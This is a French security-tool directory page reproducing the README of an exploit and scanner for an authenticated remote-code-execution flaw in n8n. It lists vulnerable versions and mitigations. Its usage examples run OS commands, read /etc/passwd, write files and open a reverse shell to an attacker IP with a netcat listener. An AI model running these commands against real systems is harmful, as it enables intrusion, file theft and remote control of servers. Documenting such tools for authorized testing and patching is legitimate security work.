Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/gagaltotal/n8n-cve-2025-68613
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHub
gagaltotal/n8n-cve-2025-68613

n8n-cve-2025-68613

Exploit RCE authentifié et scanner de vulnérabilité pour CVE-2025-68613 dans n8n. Prend en charge l'exécution de commandes, les opérations sur fichiers et les charges utiles de reverse shell pour des tests de sécurité autorisés.

Voir le dépôtSite web
10il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-68613 – Injection d’Expression n8n menant à une Exécution de Code à Distance (RCE)

Python Security CVE Status

Cette boîte à outils fournit des scripts de scan et un PoC d’exploitation pour la vulnérabilité critique CVE-2025-68613 affectant la plateforme d’automatisation de workflows n8n.

This repository provides scanner and exploit PoC scripts for the critical CVE-2025-68613 vulnerability affecting n8n Workflow Automation Platform.


AVERTISSEMENT / PERINGATAN

Français

Cet outil est UNIQUEMENT destiné aux tests de sécurité AUTORISÉS et LÉGAUX. Son utilisation sur un système sans autorisation du propriétaire est interdite.

English

This tool is ONLY for authorized and legal security testing. Unauthorized usage is illegal and prohibited.


Aperçu de la vulnérabilité

  • ID CVE : CVE-2025-68613
  • Sévérité : Critique
  • CVSS : 10.0
  • Type : Injection d’Expression → Exécution de Code à Distance (RCE)
  • Produit : Plateforme d’automatisation de workflows n8n

Versions vulnérables

  • 0.211.0 – 1.120.3
  • 1.121.0

Versions corrigées

  • 1.120.4+
  • 1.121.1+
  • 1.122.0+

Structure du dépôt

root@kitploit:~
.
├── tot-scanner-2025-68613.py   # Scanner de vulnérabilité (SANS exploitation)
├── tot-exploit-2025-68613.py   # PoC d’exploitation RCE authentifié
├── requirements.txt
└── README.md

Scanner (Sans Exploitation)

Le scanner est utilisé pour :

  • Détecter le service n8n
  • Extraire la version de n8n
  • Déterminer le statut de vulnérabilité
  • N’effectue aucune exploitation
  • Prend en charge la sortie JSON

The scanner:

  • Detects n8n service
  • Extracts n8n version
  • Determines vulnerability status
  • No exploitation
  • Supports JSON output

Le scanner vérifie les points de terminaison suivants :

  • /
  • /rest/settings
  • /healthz
  • /api/v1/health

Dépendances / Prérequis

Français

Paquets requis :

  • requests

Contenu du fichier requirements.txt :

root@kitploit:~
requests>=2.28.0

English

Required packages:

  • requests

requirements.txt content:

root@kitploit:~
requests>=2.28.0

Installation

root@kitploit:~
pip install -r requirements.txt

Utilisation du scanner

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678

Mode JSON du scanner

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json

Exemple de sortie JSON du scanner

root@kitploit:~
{
  "target": "http://target.com:5678",
  "detected": true,
  "version": "1.121.0",
  "vulnerable": true,
  "status": "vulnerable",
  "cve": "CVE-2025-68613"
}

Codes de retour du scanner

CodeSignification
0Non vulnérable
1Version inconnue
2Vulnérable

PoC d’exploitation (RCE authentifié)

Cet exploit nécessite des identifiants n8n valides.
L’accès authentifié est OBLIGATOIRE.

L’exploitation fonctionne en :

  1. Se connectant à n8n
  2. Créant un workflow
  3. Insérant une expression malveillante dans le nœud Set
  4. Exécutant le workflow
  5. (Optionnel) Nettoyage du workflow

Arguments de l’exploit

ArgumentRequisDescription
-u / --url✅URL cible n8n
-e / --email✅Email du compte n8n
-p / --password✅Mot de passe du compte n8n
--payload✅Type de charge utile
--command❌Commande OS (cmd)
--file❌Chemin de fichier (read/write)
--content❌Contenu du fichier (write)
--lhost❌IP de l’attaquant (revshell)
--lport❌Port de l’attaquant (revshell)
--verify-ssl❌Vérifier le certificat SSL

Charges utiles prises en charge

Charge utileFonction
infoInformations système
cmdExécution de commande
envVidage des variables d’environnement
readLecture de fichier
writeÉcriture de fichier
revshellShell inversé

Capture d’écran

Exemples d’exploitation

Informations système

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload info

Exécution de commande

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload cmd  --command "id"

Lecture de fichier

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload read  --file /etc/passwd

Écriture de fichier

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload write  --file /tmp/pwned.txt  --content "owned"

Shell inversé

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload revshell  --lhost 10.10.14.5  --lport 4444

Atténuation

  • Mettez à jour n8n vers les versions corrigées
  • Restreignez l’accès aux points de terminaison /rest/*
  • Appliquez un contrôle d’accès basé sur les rôles (RBAC) et une authentification forte
  • Auditez les workflows inconnus

Avertissement

Ce projet est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
L’auteur n’est pas responsable d’une mauvaise utilisation.


Sujets GitHub

root@kitploit:~
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python

Restez légal. Restez éthique.

Télécharger l’outil